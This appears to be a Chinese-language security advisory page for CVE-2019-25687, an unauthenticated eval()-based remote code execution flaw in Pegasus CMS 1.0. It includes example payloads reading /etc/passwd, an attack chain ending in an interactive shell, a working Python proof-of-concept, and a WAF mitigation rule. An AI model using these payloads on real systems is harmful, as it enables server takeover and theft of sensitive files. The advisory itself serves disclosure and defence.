IPBUF安全漏洞报告
English
CVE-2019-25687 CVSS 9.8 严重

CVE-2019-25687: Pegasus CMS远程代码执行漏洞

披露日期: 2026-04-05

漏洞信息

漏洞编号
CVE-2019-25687
漏洞类型
远程代码执行
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Pegasus CMS

相关标签

RCE远程代码执行Pegasus CMSCVE-2019-25687代码注入Web安全

漏洞概述

Pegasus CMS 1.0版本中的extra_fields.php插件存在严重的远程代码执行漏洞。由于该插件使用了不安全的eval()函数处理用户输入,未经身份验证的攻击者可以通过向submit.php端点发送特制的POST请求,在action参数中注入恶意PHP代码。成功利用该漏洞可导致攻击者在服务器上任意执行命令,获取交互式Shell,从而完全控制受害系统。该漏洞CVSS v3.1评分为9.8,属于严重级别安全风险。

技术细节

该漏洞的核心成因在于Pegasus CMS 1.0版本中`extra_fields.php`插件对用户输入的处理存在严重缺陷。开发人员直接使用了PHP语言中的`eval()`函数来处理通过POST请求提交的`action`参数。`eval()`函数非常危险,它会将传入的字符串当作PHP代码直接解析并执行。由于缺乏任何输入校验、过滤或安全编码机制,攻击者可以轻易构造包含恶意系统命令的字符串。攻击者无需任何身份验证,只需向`submit.php`端点发送POST请求,并将`action`参数赋值为如`system('whoami')`或`passthru('cat /etc/passwd')`等恶意Payload。当服务器端接收到该请求并执行`eval()`时,恶意代码即被触发。这使得攻击者能够获得服务器端的Webshell权限,进而读取敏感文件、控制服务器或横向移动,对系统的机密性、完整性和可用性造成严重破坏。

攻击链分析

STEP 1
侦察
攻击者识别目标服务器正在运行Pegasus CMS 1.0版本。
STEP 2
漏洞利用
攻击者构造包含恶意PHP代码(如system函数调用)的POST请求,发送至submit.php端点的action参数。
STEP 3
代码执行
服务器端extra_fields.php插件使用eval()函数解析action参数,导致恶意PHP代码被执行。
STEP 4
维持权限
攻击者通过执行的系统命令获取交互式Shell,进一步控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit_rce(target_url): """ PoC for CVE-2019-25687 Exploits unsafe eval in submit.php action parameter """ target_endpoint = f"{target_url}/submit.php" # Malicious PHP code to execute 'id' command payload = "system('id');" data = { "action": payload } try: response = requests.post(target_endpoint, data=data, timeout=5) if response.status_code == 200: print(f"[+] Request sent to {target_endpoint}") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": # Replace with actual target URL target = "http://127.0.0.1" exploit_rce(target)

影响范围

Pegasus CMS 1.0

防御指南

临时缓解措施
若无法立即升级,建议在Web应用防火墙(WAF)中添加规则,拦截对submit.php的请求中包含system、exec、shell_exec等敏感函数的参数。同时,限制对submit.php的访问权限,仅允许受信任的IP地址访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表